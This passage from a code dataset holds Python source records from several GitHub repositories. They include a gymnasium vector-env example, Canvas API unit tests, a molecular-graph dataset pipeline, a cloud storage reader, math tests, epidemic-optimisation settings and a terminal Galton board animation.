state, info = vec_env.reset()\n\n    for i in range(5000):\n        action = vec_env.action_space.sample()\n        # gymnasium envs step with a 5-tuple: (obs, reward, terminated, truncated, info)\n        state, reward, terminated, truncated, _ = vec_env.step(action)\n        done = terminated | truncated\n        if any(done):\n            done_idx = [i for i, e in enumerate(done) if e]\n            print(f\"{done_idx}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"yhisaki/rl-algos","sub_path":"example/external_lib/example_gym_vec_env.py","file_name":"example_gym_vec_env.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1674953529","text":"from unittest import TestCase\nfrom commonconf import override_settings\nfrom uw_canvas import MissingAccountID\nfrom uw_canvas.utilities import fdao_canvas_override\nfrom uw_canvas.grading_standards import GradingStandards\nimport mock\n\n\n@fdao_canvas_override\nclass CanvasTestGradingStandards(TestCase):\n    def setUp(self):\n        self.account_json_data = {\n            \"id\": \"2\",\n            \"title\": \"Test Account Grading Standard\",\n            \"context_type\": \"Account\",\n            
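# [added comment] minimal fixture shaped like the grading-standard JSON the Canvas API returns\n            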
\"context_id\": \"999999\",\n \"grading_scheme\": [\n {\"name\": \"A\", \"value\": 0.95},\n {\"name\": \"B\", \"value\": 0.85},\n {\"name\": \"C\", \"value\": 0.75},\n {\"name\": \"D\", \"value\": 0.65},\n ]\n }\n\n self.course_json_data = {\n \"id\": \"1\",\n \"title\": \"Test Course Grading Standard\",\n \"context_type\": \"Course\",\n \"context_id\": \"123456\",\n \"grading_scheme\": [\n {\"name\": \"A\", \"value\": 0.9},\n {\"name\": \"B\", \"value\": 0.8},\n {\"name\": \"C\", \"value\": 0.7},\n {\"name\": \"D\", \"value\": 0.6},\n ]\n }\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_get_grading_standard_for_account(self, mock_get):\n mock_get.return_value = self.account_json_data\n canvas = GradingStandards()\n\n model = canvas.get_grading_standard_for_account(\n \"999999\", \"123\")\n mock_get.assert_called_with(\n '/api/v1/accounts/999999/grading_standards/123')\n self.assertEqual(model.json_data(), self.account_json_data)\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_find_grading_standard_for_account(self, mock_get):\n mock_get.return_value = self.account_json_data\n canvas = GradingStandards()\n model = canvas.find_grading_standard_for_account(999999, 2)\n self.assertEqual(model.json_data(), self.account_json_data)\n\n @override_settings(RESTCLIENTS_CANVAS_ACCOUNT_ID=None)\n def test_find_grading_standard_for_missing_root_account(self):\n canvas = GradingStandards()\n self.assertRaises(\n MissingAccountID, canvas.find_grading_standard_for_account,\n 999999, 2)\n\n @mock.patch.object(GradingStandards, '_get_resource')\n def test_get_grading_standard_for_course(self, mock_get):\n mock_get.return_value = self.course_json_data\n canvas = GradingStandards()\n\n model = canvas.get_grading_standard_for_course(\n \"123456\", \"225\")\n mock_get.assert_called_with(\n '/api/v1/courses/123456/grading_standards/225')\n self.assertEqual(model.json_data(), self.course_json_data)\n\n @mock.patch.object(GradingStandards, '_get_resource_url')\n def test_get_grading_standards_for_course(self, mock_get):\n mock_get.return_value = [self.course_json_data]\n canvas = GradingStandards()\n\n ret = canvas.get_grading_standards_for_course(\"123456\")\n mock_get.assert_called_with(\n '/api/v1/courses/123456/grading_standards', True, None)\n\n model = ret[0]\n self.assertEqual(\n model.grading_standard_id, self.course_json_data[\"id\"])\n self.assertEqual(model.title, self.course_json_data[\"title\"])\n self.assertEqual(\n model.context_type, self.course_json_data[\"context_type\"])\n self.assertEqual(\n model.context_id, self.course_json_data[\"context_id\"])\n self.assertEqual(\n model.grading_scheme, self.course_json_data[\"grading_scheme\"])\n\n @mock.patch.object(GradingStandards, '_post_resource')\n def test_create_grading_standard_for_course(self, mock_create):\n mock_create.return_value = None\n canvas = GradingStandards()\n\n canvas.create_grading_standard_for_course(\n \"123456\", \"New Grading Standard\", [{\"name\": \"A\", \"value\": 0.9}],\n \"5555555\")\n mock_create.assert_called_with(\n '/api/v1/courses/123456/grading_standards', {\n 'title': 'New Grading Standard',\n 'grading_scheme_entry': [{\"name\": \"A\", \"value\": 0.9}],\n 'as_user_id': '5555555'})\n","repo_name":"uw-it-aca/uw-restclients-canvas","sub_path":"uw_canvas/tests/test_grading_standards.py","file_name":"test_grading_standards.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} 
+{"seq_id":"72379315627","text":"import functools\nfrom typing import List, Optional\n\nimport jax\nimport jraph\nfrom ml_collections import config_dict\nimport numpy as np\nfrom ogb import utils\nfrom ogb.utils import features\nimport tensorflow.compat.v2 as tf\nimport tensorflow_datasets as tfds\nimport tree\n\n# pylint: disable=g-bad-import-order\n# pytype: disable=import-error\nimport batching_utils\nimport conformer_utils\nimport datasets\n\n\ncurry = lambda f: functools.partial(functools.partial, f)\n\n\ndef build_dataset_iterator(\n data_root: str,\n split: str,\n dynamic_batch_size_config: config_dict.ConfigDict,\n sample_random: float,\n cached_conformers_file: str,\n debug: bool = False,\n is_training: bool = True,\n augment_with_random_mirror_symmetry: bool = False,\n positions_noise_std: Optional[float] = None,\n k_fold_split_id: Optional[int] = None,\n num_k_fold_splits: Optional[int] = None,\n filter_in_or_out_samples_with_nans_in_conformers: Optional[str] = None,\n):\n \"\"\"Returns an iterator over Batches from the dataset.\"\"\"\n if debug:\n max_items_to_read_from_dataset = 10\n prefetch_buffer_size = 1\n shuffle_buffer_size = 1\n else:\n max_items_to_read_from_dataset = -1 # < 0 means no limit.\n prefetch_buffer_size = 64\n # It can take a while to fill the shuffle buffer with k fold splits.\n shuffle_buffer_size = 128 if k_fold_split_id is None else int(1e6)\n\n num_local_devices = jax.local_device_count()\n\n # Load all smile strings.\n indices, smiles, labels = _load_smiles(\n data_root,\n split,\n k_fold_split_id=k_fold_split_id,\n num_k_fold_splits=num_k_fold_splits)\n if debug:\n indices = indices[:100]\n smiles = smiles[:100]\n labels = labels[:100]\n # Generate all conformer features from smile strings ahead of time.\n # This gives us a boost from multi-parallelism as opposed to doing it\n # online.\n conformers = _load_conformers(indices, smiles, cached_conformers_file)\n\n data_generator = (\n lambda: _get_pcq_graph_generator(indices, smiles, labels, conformers))\n # Create a dataset yielding graphs from smile strings.\n example = next(data_generator())\n signature_from_example = tree.map_structure(_numpy_to_tensor_spec, example)\n ds = tf.data.Dataset.from_generator(\n data_generator, output_signature=signature_from_example)\n\n ds = ds.take(max_items_to_read_from_dataset)\n ds = ds.cache()\n if is_training:\n ds = ds.shuffle(shuffle_buffer_size)\n\n # Apply transformations.\n def map_fn(graph, conformer_positions):\n graph = _maybe_one_hot_atoms_with_noise(\n graph, is_training=is_training, sample_random=sample_random)\n # Add conformer features.\n graph = _add_conformer_features(\n graph,\n conformer_positions,\n augment_with_random_mirror_symmetry=augment_with_random_mirror_symmetry,\n noise_std=positions_noise_std,\n is_training=is_training,\n )\n return _downcast_ints(graph)\n\n ds = ds.map(map_fn, num_parallel_calls=tf.data.AUTOTUNE)\n if filter_in_or_out_samples_with_nans_in_conformers:\n if filter_in_or_out_samples_with_nans_in_conformers not in (\"in\", \"out\"):\n raise ValueError(\n \"Unknown value specified for the argument \"\n \"`filter_in_or_out_samples_with_nans_in_conformers`: %s\" %\n filter_in_or_out_samples_with_nans_in_conformers)\n\n filter_fn = _get_conformer_filter(\n with_nans=(filter_in_or_out_samples_with_nans_in_conformers == \"in\"))\n ds = ds.filter(filter_fn)\n\n if is_training:\n ds = ds.shard(jax.process_count(), jax.process_index())\n ds = ds.repeat()\n\n ds = ds.prefetch(prefetch_buffer_size)\n it = tfds.as_numpy(ds)\n\n # 
Dynamic batching.\n batched_gen = batching_utils.dynamically_batch(\n it,\n n_node=dynamic_batch_size_config.n_node + 1,\n n_edge=dynamic_batch_size_config.n_edge,\n n_graph=dynamic_batch_size_config.n_graph + 1,\n )\n\n if is_training:\n # Stack `num_local_devices` of batches together for pmap updates.\n batch_size = num_local_devices\n\n def _batch(l):\n assert l\n return tree.map_structure(lambda *l: np.stack(l, axis=0), *l)\n\n def batcher_fn():\n batch = []\n for sample in batched_gen:\n batch.append(sample)\n if len(batch) == batch_size:\n yield _batch(batch)\n batch = []\n if batch:\n yield _batch(batch)\n\n for sample in batcher_fn():\n yield sample\n else:\n for sample in batched_gen:\n yield sample\n\n\ndef _get_conformer_filter(with_nans: bool):\n \"\"\"Selects a conformer filter to apply.\n\n Args:\n with_nans: Filter only selects samples with NaNs in conformer features.\n Else, selects samples without any NaNs in conformer features.\n\n Returns:\n A function that can be used with tf.data.Dataset.filter().\n\n Raises:\n ValueError:\n If the input graph to the filter has no conformer features to filter.\n \"\"\"\n\n def _filter(graph: jraph.GraphsTuple) -> tf.Tensor:\n\n if (\"positions\" not in graph.nodes) or (\n \"positions_targets\" not in graph.nodes) or (\n \"positions_nan_mask\" not in graph.globals):\n raise ValueError(\"Conformer features not available to filter.\")\n\n any_nan = tf.logical_not(tf.squeeze(graph.globals[\"positions_nan_mask\"]))\n return any_nan if with_nans else tf.logical_not(any_nan)\n\n return _filter\n\n\ndef _numpy_to_tensor_spec(arr: np.ndarray) -> tf.TensorSpec:\n if not isinstance(arr, np.ndarray):\n return tf.TensorSpec([],\n dtype=tf.int32 if isinstance(arr, int) else tf.float32)\n elif arr.shape:\n return tf.TensorSpec((None,) + arr.shape[1:], arr.dtype)\n else:\n return tf.TensorSpec([], arr.dtype)\n\n\ndef _sample_uniform_categorical(num: int, size: int) -> tf.Tensor:\n return tf.random.categorical(tf.math.log([[1 / size] * size]), num)[0]\n\n\n@curry(jax.tree_map)\ndef _downcast_ints(x):\n if x.dtype == tf.int64:\n return tf.cast(x, tf.int32)\n return x\n\n\ndef _one_hot_atoms(atoms: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_atom_feature_dims()\n one_hots = []\n for i in range(atoms.shape[1]):\n one_hots.append(tf.one_hot(atoms[:, i], vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _sample_one_hot_atoms(atoms: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_atom_feature_dims()\n one_hots = []\n num_atoms = tf.shape(atoms)[0]\n for i in range(atoms.shape[1]):\n sampled_category = _sample_uniform_categorical(num_atoms, vocab_sizes[i])\n one_hots.append(\n tf.one_hot(sampled_category, vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _one_hot_bonds(bonds: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_bond_feature_dims()\n one_hots = []\n for i in range(bonds.shape[1]):\n one_hots.append(tf.one_hot(bonds[:, i], vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _sample_one_hot_bonds(bonds: tf.Tensor) -> tf.Tensor:\n vocab_sizes = features.get_bond_feature_dims()\n one_hots = []\n num_bonds = tf.shape(bonds)[0]\n for i in range(bonds.shape[1]):\n sampled_category = _sample_uniform_categorical(num_bonds, vocab_sizes[i])\n one_hots.append(\n tf.one_hot(sampled_category, vocab_sizes[i], dtype=tf.float32))\n return tf.concat(one_hots, axis=-1)\n\n\ndef _maybe_one_hot_atoms_with_noise(\n x,\n is_training: bool,\n sample_random: 
float,\n):\n  \"\"\"One hot atoms with noise.\"\"\"\n  gt_nodes = _one_hot_atoms(x.nodes)\n  gt_edges = _one_hot_bonds(x.edges)\n  if is_training:\n    num_nodes = tf.shape(x.nodes)[0]\n    sample_node_or_not = tf.random.uniform([num_nodes],\n                                           maxval=1) < sample_random\n    nodes = tf.where(\n        tf.expand_dims(sample_node_or_not, axis=-1),\n        _sample_one_hot_atoms(x.nodes), gt_nodes)\n    num_edges = tf.shape(x.edges)[0]\n    sample_edges_or_not = tf.random.uniform([num_edges],\n                                            maxval=1) < sample_random\n    edges = tf.where(\n        tf.expand_dims(sample_edges_or_not, axis=-1),\n        _sample_one_hot_bonds(x.edges), gt_edges)\n  else:\n    nodes = gt_nodes\n    edges = gt_edges\n  return x._replace(\n      nodes={\n          \"atom_one_hots_targets\": gt_nodes,\n          \"atom_one_hots\": nodes,\n      },\n      edges={\n          \"bond_one_hots_targets\": gt_edges,\n          \"bond_one_hots\": edges\n      })\n\n\ndef _load_smiles(\n    data_root: str,\n    split: str,\n    k_fold_split_id: int,\n    num_k_fold_splits: int,\n):\n  \"\"\"Loads SMILES strings for the input split.\"\"\"\n\n  if split == \"test\" or k_fold_split_id is None:\n    indices = datasets.load_splits()[split]\n  elif split == \"train\":\n    indices = datasets.load_all_except_kth_fold_indices(\n        data_root, k_fold_split_id, num_k_fold_splits)\n    indices += datasets.load_splits()[\"train\"]\n  else:\n    assert split == \"valid\"\n    indices = datasets.load_kth_fold_indices(data_root, k_fold_split_id)\n\n  smiles_and_labels = datasets.load_smile_strings(with_labels=True)\n  smiles, labels = list(zip(*smiles_and_labels))\n  return indices, [smiles[i] for i in indices], [labels[i] for i in indices]\n\n\ndef _convert_ogb_graph_to_graphs_tuple(ogb_graph):\n  \"\"\"Converts an OGB Graph to a GraphsTuple.\"\"\"\n  senders = ogb_graph[\"edge_index\"][0]\n  receivers = ogb_graph[\"edge_index\"][1]\n  edges = ogb_graph[\"edge_feat\"]\n  nodes = ogb_graph[\"node_feat\"]\n  n_node = np.array([ogb_graph[\"num_nodes\"]])\n  n_edge = np.array([len(senders)])\n  graph = jraph.GraphsTuple(\n      nodes=nodes,\n      edges=edges,\n      senders=senders,\n      receivers=receivers,\n      n_node=n_node,\n      n_edge=n_edge,\n      globals=None)\n  return tree.map_structure(lambda x: x if x is not None else np.array(0.),\n                            graph)\n\n\ndef _load_conformers(indices: List[int],\n                     smiles: List[str],\n                     cached_conformers_file: str):\n  \"\"\"Loads conformers.\"\"\"\n  smile_to_conformer = datasets.load_cached_conformers(cached_conformers_file)\n  conformers = []\n  for graph_idx, smile in zip(indices, smiles):\n    del graph_idx # Unused.\n    if smile not in smile_to_conformer:\n      raise KeyError(\"Cache did not have conformer entry for the smile %s\" %\n                     str(smile))\n    conformers.append(dict(conformer=smile_to_conformer[smile]))\n  return conformers\n\n\ndef _add_conformer_features(\n    graph,\n    conformer_features,\n    augment_with_random_mirror_symmetry: bool,\n    noise_std: float,\n    is_training: bool,\n):\n  \"\"\"Adds conformer features.\"\"\"\n  if not isinstance(graph.nodes, dict):\n    raise ValueError(\"Expected a dict type for `graph.nodes`.\")\n  # Remove mean position to center around a canonical origin.\n  positions = conformer_features[\"conformer\"]\n  # NaNs appear in ~0.13% of training, 0.104% of validation and 0.16% of test\n  # nodes.\n  # See this colab: http://shortn/_6UcuosxY7x.\n  nan_mask = tf.reduce_any(tf.math.is_nan(positions))\n\n  positions = tf.where(nan_mask, tf.constant(0., positions.dtype), positions)\n  positions -= tf.reduce_mean(positions, axis=0, keepdims=True)\n\n  # Optionally augment with a random rotation.\n  if is_training:\n    rot_mat = conformer_utils.get_random_rotation_matrix(\n        
augment_with_random_mirror_symmetry)\n    positions = conformer_utils.rotate(positions, rot_mat)\n  positions_targets = positions\n\n  # Optionally add noise to the positions.\n  if noise_std and is_training:\n    positions = tf.random.normal(tf.shape(positions), positions, noise_std)\n\n  return graph._replace(\n      nodes=dict(\n          positions=positions,\n          positions_targets=positions_targets,\n          **graph.nodes),\n      globals={\n          \"positions_nan_mask\":\n              tf.expand_dims(tf.logical_not(nan_mask), axis=0),\n          **(graph.globals if isinstance(graph.globals, dict) else {})\n      })\n\n\ndef _get_pcq_graph_generator(indices, smiles, labels, conformers):\n  \"\"\"Returns a generator that yields graphs.\"\"\"\n  for idx, smile, conformer_positions, label in zip(indices, smiles, conformers,\n                                                    labels):\n    graph = utils.smiles2graph(smile)\n    graph = _convert_ogb_graph_to_graphs_tuple(graph)\n    graph = graph._replace(\n        globals={\n            \"target\": np.array([label], dtype=np.float32),\n            \"graph_index\": np.array([idx], dtype=np.int32),\n            **(graph.globals if isinstance(graph.globals, dict) else {})\n        })\n    yield graph, conformer_positions\n","repo_name":"deepmind/deepmind-research","sub_path":"ogb_lsc/pcq/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":12362,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"35232878381","text":"import io\nimport zipfile\nimport structlog\n\nfrom google.api_core.exceptions import NotFound\nfrom google.cloud import storage\nfrom app.store import OUTPUT_BUCKET_NAME, storage_client\nfrom app.gpg.decryption import decrypt_output\n\nlogger = structlog.get_logger()\n\n\ndef get_files(file_path) -> dict:\n    \"\"\"\n    Survey submissions intended for the legacy system are transformed by SDX into several different files\n    which are zipped up together and then encrypted.\n\n    Comments are extracted from the survey submissions and batched up into xlsx files and zipped up every morning.\n    The output is encrypted zip files.\n\n    This function reads those encrypted zips, decrypts the output and extracts the zip for survey submissions and\n    significant comments.
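 All branches return a dict mapping a name to the decrypted contents.\n    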
Extraction is not required for other types of submissions.\n \"\"\"\n file_dir = file_path.split(\"/\")[0]\n filename = file_path.split(\"/\")[1]\n if file_dir == 'survey' or file_dir == 'comments':\n encrypted_zip = read(file_path, OUTPUT_BUCKET_NAME)\n zip_bytes = decrypt_output(encrypted_zip, filename)\n return extract_zip(zip_bytes)\n else:\n encrypted_data = read(file_path, OUTPUT_BUCKET_NAME)\n data_bytes = decrypt_output(encrypted_data, filename)\n if file_dir == 'seft':\n files = {'SEFT': data_bytes}\n else:\n files = {'JSON': data_bytes.decode()}\n return files\n\n\ndef read(file_path, bucket) -> bytes:\n \"\"\"Retrieve a file from GCP output bucket: {PROJECT_ID}-outputs\"\"\"\n try:\n # get bucket with name\n bucket = storage_client.bucket(bucket)\n # get bucket data as blob\n blob = bucket.blob(file_path)\n # convert to bytes\n file = blob.download_as_bytes()\n return file\n\n except NotFound as e:\n print(e)\n\n\ndef extract_zip(zip_bytes: bytes) -> dict:\n z = zipfile.ZipFile(io.BytesIO(zip_bytes), \"r\")\n files = {}\n for filename in z.namelist():\n logger.info(f'File: {filename}')\n file_bytes = z.read(filename)\n files[filename] = file_bytes\n\n z.close()\n return files\n\n\ndef get_comment_files() -> bytes:\n bucket = storage_client.bucket(OUTPUT_BUCKET_NAME)\n files = bucket.list_blobs(prefix='comments')\n file_list = [(file.name, file.time_created) for file in files]\n file_list = sorted(file_list, key=lambda f: f[1], reverse=True)\n print(file_list)\n latest_filename = file_list[0][0]\n encrypted_zip = read(latest_filename, OUTPUT_BUCKET_NAME)\n zip_bytes = decrypt_output(encrypted_zip, 'comments')\n return zip_bytes\n\n\ndef does_comment_exist() -> bool:\n bucket = storage_client.bucket(OUTPUT_BUCKET_NAME)\n files = bucket.list_blobs(prefix='comments')\n file_list = [file.name for file in files]\n return len(file_list) > 0\n\n\ndef check_file_exists(file_name, bucket=OUTPUT_BUCKET_NAME) -> bool:\n logger.info(f'Checking for: {file_name} in {bucket}')\n bucket = storage_client.bucket(bucket)\n return storage.Blob(bucket=bucket, name=file_name).exists(storage_client)\n\n\ndef check_bucket_exists(my_bucket) -> bool:\n list_of_buckets = storage_client.list_buckets()\n for x in list_of_buckets:\n if my_bucket == x.name:\n return True\n return False\n","repo_name":"ONSdigital/sdx-tester","sub_path":"app/store/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70036994026","text":"'''\nmodule for testing\nmaths.power.py from\npyalgo math module\n'''\n\nimport sys\nimport os\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport unittest\nfrom maths.power import big_power, mod_power\n\nclass TestPower(unittest.TestCase):\n\n def test_big_power(self):\n result = big_power(23, 12)\n\n self.assertEqual(result, 21914624432020321)\n\n def test_mod_power(self):\n result = mod_power(23, 12, 10 ** 9 + 7)\n\n self.assertEqual(result, 278617953)\n\nif __name__ == \"__main__\":\n unittest.main()\n\n'''\nPyAlgo\nDevansh Singh, 2021\n'''\n","repo_name":"4RCAN3/PyAlgo","sub_path":"pyalgo/test/test_power.py","file_name":"test_power.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12436984544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 9 14:09:22 2022\n\nThis script initializes 
all the necessary parameters. It also creates necessary\ninitial files and a unique output directory to avoid loss of data if requested\nby the user\n\n@author: Jan-Hendrik Niemann\n\"\"\"\n\n\nimport json\nimport os\nimport re\nimport numpy as np\n\n\n# Settings\npath_to_GERDA = ''\nworking_directory = ''\ndata_path = '/data'\ngeopath = 'input_data/geo/'\ngeofiles = {0: 'Buildings_Gangelt_MA_1.csv',\n            1: 'Buildings_Gangelt_MA_3.csv'}\nworld_to_pick = 1 # Version of modeled town (Gangelt)\nn_initially_infected = 5 # Number of initially infected persons\ntotal_timesteps = 49 * 24 # Time in [hours], days * 24\nduration_of_constant_control = 7 * 24 # Time in [hours]\ngeneral_infectivity = 0.175 # GERDA parameter\ngeneral_interaction_frequency = 1 # GERDA parameter\nfd_step_size = 0.1 # Initial finite difference step size\neps = 0.25 # Relative accuracy of gradient estimate\nc1 = 0.1 # Fraction of descent promised\nsamplesize_max = 1e6 # Maximum number of objective and gradient estimates\nsaved_world = 'Reduced_Gangelt_n1096_worldObj.pkl' # Name of GERDA world object\nn_agents = 1096 # Number of agents of the GERDA model\noutput_directory = 'output_'\nrho = 0.5 # Initial trust region radius\nrho_min = 1e-4 # Minimal trust region radius\nresume_iterations_at = 0\nmax_iterations = 15 # Number of iterations\nmax_coarse_steps = 100 # Number of coarse model iterations\nobj_est_MC_sim_init = 100 # Initial number of objective estimates\ngrad_est_MC_sim_init = 100 # Initial number of gradient estimates\nfit_ODE = False # Fit ODE in every iteration\nu_school_min = 0 # Bounds on controls\nu_school_max = 1 # Bounds on controls\nu_work_min = 0 # Bounds on controls\nu_work_max = 0.8 # Bounds on controls\nfast_mode = False # Use ODE with noise instead of Markov jump process\n\n# %%\n\n\ndef get_files(path):\n    for file in os.listdir(path):\n        if os.path.isfile(os.path.join(path, file)):\n            yield file\n\n\n# Create dictionary with settings\nx = {\"path_to_GERDA\": path_to_GERDA,\n     \"working_directory\": working_directory,\n     \"geopath\": geopath,\n     \"geofiles\": geofiles,\n     \"world_to_pick\": world_to_pick,\n     \"n_initially_infected\": n_initially_infected,\n     \"total_timesteps\": total_timesteps,\n     \"duration_of_constant_control\": duration_of_constant_control,\n     \"general_infectivity\": general_infectivity,\n     \"general_interaction_frequency\": general_interaction_frequency,\n     \"fd_step_size\": fd_step_size,\n     \"data_path\": data_path,\n     \"eps\": eps,\n     \"c1\": c1,\n     \"samplesize_max\": samplesize_max,\n     \"saved_world\": saved_world,\n     \"n_agents\": n_agents,\n     \"output_directory\": output_directory,\n     \"rho\": rho,\n     \"rho_min\": rho_min,\n     # \"max_recursive_trust_region_steps\": max_recursive_trust_region_steps,\n     \"max_coarse_steps\": max_coarse_steps,\n     \"resume_iterations_at\": resume_iterations_at,\n     \"max_iterations\": max_iterations,\n     \"fit_ODE\": fit_ODE,\n     \"u_school_min\": u_school_min,\n     \"u_school_max\": u_school_max,\n     \"u_work_min\": u_work_min,\n     \"u_work_max\": u_work_max,\n     \"obj_est_MC_sim_init\": obj_est_MC_sim_init,\n     \"grad_est_MC_sim_init\": grad_est_MC_sim_init,\n     \"fast_mode\": fast_mode\n     }\n\nresume_work = False\n\n# Ask if new output directory is requested by the user\nnew_out_dir = input('Do you want to create a new output directory? ')\nnew_out_dir = new_out_dir.lower()\n\nwhile new_out_dir not in {'yes', 'no'}:\n    new_out_dir = input('Do you want to create a new output directory? 
')\n    new_out_dir = new_out_dir.lower()\n\nif new_out_dir in {'yes'}:\n    new_output_dir = True\nelse:\n    new_output_dir = False\n    print('Current data directory is', data_path)\n    old_out_dir = input('Please enter the name of an existing output directory: ')\n\n    while not os.path.isdir(os.path.join(data_path, old_out_dir)):\n        print('%s is not an existing directory' % old_out_dir)\n        old_out_dir = input('Please enter the name of an existing output directory: ')\n\n    x['output_directory'] = old_out_dir\n\n    resume_work = input('Do you want to resume your work? ')\n    resume_work = resume_work.lower()\n\n    while resume_work not in {'yes', 'no'}:\n        resume_work = input('Do you want to resume your work? ')\n        resume_work = resume_work.lower()\n\n    if resume_work in {'yes'}:\n        resume_work = True\n        list_of_files = []\n\n        print(r'These are all files Ju_*.csv I have found:')\n        for file in get_files(os.path.join(data_path, old_out_dir)):\n            if 'Ju_' in file:\n                list_of_files.append(file)\n                print(file)\n\n        itr = 0\n        for file in list_of_files:\n            num = int(re.search('Ju_(\\d*)', file).group(1)) # Assuming filename is \"Ju_xxx.csv\"\n            if num > itr:\n                itr = num\n        print('The last iteration was %g' % itr)\n\n        resume_work_at = input('Do you want to resume your work with iteration %g? ' % (itr + 1))\n        resume_work_at = resume_work_at.lower()\n\n        while resume_work_at not in {'yes', 'no'}:\n            resume_work_at = input('Do you want to resume your work with iteration %g? ' % (itr + 1))\n            resume_work_at = resume_work_at.lower()\n\n        if resume_work_at in {'yes'}:\n            x['resume_iterations_at'] = itr + 1\n        else:\n            itr = input('At which step do you want to resume your work? ')\n\n            while not itr.isdigit():\n                itr = input('Please enter an integer! ')\n\n            x['resume_iterations_at'] = int(itr)\n\n    else:\n        resume_work = False\n        print('Start iteration at %g' % resume_iterations_at)\n\n\n# Create unique output directory if requested by the user\ncounter = 0\nwhile new_output_dir:\n    try:\n        os.mkdir(os.path.join(data_path, output_directory + str(counter)))\n        print('New output directory created at %s' % os.path.join(data_path, output_directory + str(counter)))\n\n        # Update output directory\n        x['output_directory'] = output_directory + str(counter)\n\n        break\n    except OSError:\n        counter = counter + 1\n\n# Save settings as json encoded file\nwith open(os.path.join(data_path, 'opt_settings.txt'), 'w') as json_file:\n    json.dump(x, json_file, indent=4, sort_keys=True, ensure_ascii=True)\n\n# Initialize control\nif resume_work:\n    control_U = np.genfromtxt(os.path.join(data_path, x['output_directory'], 'u_coarse_' + str(itr) + '.csv'), delimiter=',')\n    np.savetxt(os.path.join(data_path, 'control_U.csv'), control_U, delimiter=',')\nelse:\n    np.savetxt(os.path.join(data_path, 'control_U.csv'), np.zeros((int(total_timesteps / duration_of_constant_control), 2)), delimiter=',')\n    print('Created control_U.csv with zeros only')\n\n    # Initialize Monte Carlo simulation number for J estimates\n    with open(os.path.join(data_path, 'num_MC_sim_obj_est.csv'), 'w') as file:\n        file.write(str(obj_est_MC_sim_init))\n    print('Created num_MC_sim_obj_est.csv with initially %i Monte Carlo simulations' % obj_est_MC_sim_init)\n\n    # Initialize Monte Carlo simulation number for gradient Ju estimates\n    with open(os.path.join(data_path, 'num_MC_sim_grad_est.csv'), 'w') as file:\n        file.write(str(grad_est_MC_sim_init))\n    print('Created num_MC_sim_grad_est.csv with initially %i Monte Carlo simulations' % 
grad_est_MC_sim_init)\n","repo_name":"Henningston/MLoptABM","sub_path":"GERDA_opt_settings.py","file_name":"GERDA_opt_settings.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25644314359","text":"import os\nimport math\nimport sys\nimport time\n\n# ANSI terminal colour codes\nRED = \"\\x1B[91m\"\nGREEN = \"\\x1B[92m\"\nRESET = \"\\x1B[0m\"\n\nX_OFFSET = 2\nY_OFFSET = 6\n\ndef __clear_screen():\n\n \"\"\"\n Hopefully this is cross-platform enough: no guarantees!\n \"\"\"\n\n os.system('cls' if os.name=='nt' else 'clear')\n\ndef __gotoxy(x, y):\n\n \"\"\"\n Uses ANSI terminal codes to move cursor\n \"\"\"\n\n print(\"%c[%d;%d%s\" % (0x1B, y, x, \"H\"), end=\"\")\n sys.stdout.flush()\n\ndef on_init(gb):\n\n \"\"\"\n To be called by a GaltonBoard object when the board has first been created\n\n Just draws an empty board\n \"\"\"\n\n __clear_screen()\n\n print(\"-----------------\")\n print(\"| codedrome.com |\")\n print(\"| Galton Board |\")\n print(\"-----------------\\n\")\n\n for r in range(0, gb.gridrows):\n\n print(' ', end=\"\");\n\n for c in range(0, gb.gridcolumns):\n print(gb.board[r][c], end=\"\")\n\n print(\"\")\n\n print(\"\")\n\n # draw buckets\n for r in range(0, 16):\n\n for c in range(0, gb.rowcount + 2):\n print(GREEN + \"| \" + RESET, end=\"\")\n\n print(GREEN + \"%d\" % abs(r - 16) + RESET)\n\ndef on_ball_moved(gb):\n\n \"\"\"\n Called by GaltonBoard object when ball moves.\n \"\"\"\n\n # delete ball if it has a previous position\n if gb.prevballx >= 0 and gb.prevbally >= 0:\n __gotoxy(gb.prevballx + X_OFFSET, gb.prevbally + Y_OFFSET)\n print(\" \")\n\n # draw ball in new position\n __gotoxy(gb.ballx + X_OFFSET, gb.bally + Y_OFFSET)\n print(RED + \"o\" + RESET, end=\"\")\n sys.stdout.flush()\n\ndef on_total_changed(gb, index, count):\n\n \"\"\"\n Called by GaltonBoard object when total changes.\n \"\"\"\n\n bottom_of_bucket = 4 + gb.gridrows + 19\n\n if index == 0:\n bucketx = 2\n else:\n bucketx = (index + 1) * 2\n\n # animate ball into bucket\n starty = bottom_of_bucket - 17\n end_y = bottom_of_bucket - gb.totals[index]\n\n for y in range(starty, end_y + 1):\n\n time.sleep(gb.pause_ms/1000)\n\n __gotoxy(bucketx, y-1)\n print(\" \")\n sys.stdout.flush()\n\n __gotoxy(bucketx, y)\n print(RED + \"o\" + RESET)\n sys.stdout.flush()\n\n # show totals vertically\n total_y = bottom_of_bucket + 1\n total_x = 2\n\n for t in range(0, gb.rowcount + 1):\n\n totalstr = str(gb.totals[t])\n\n for c in 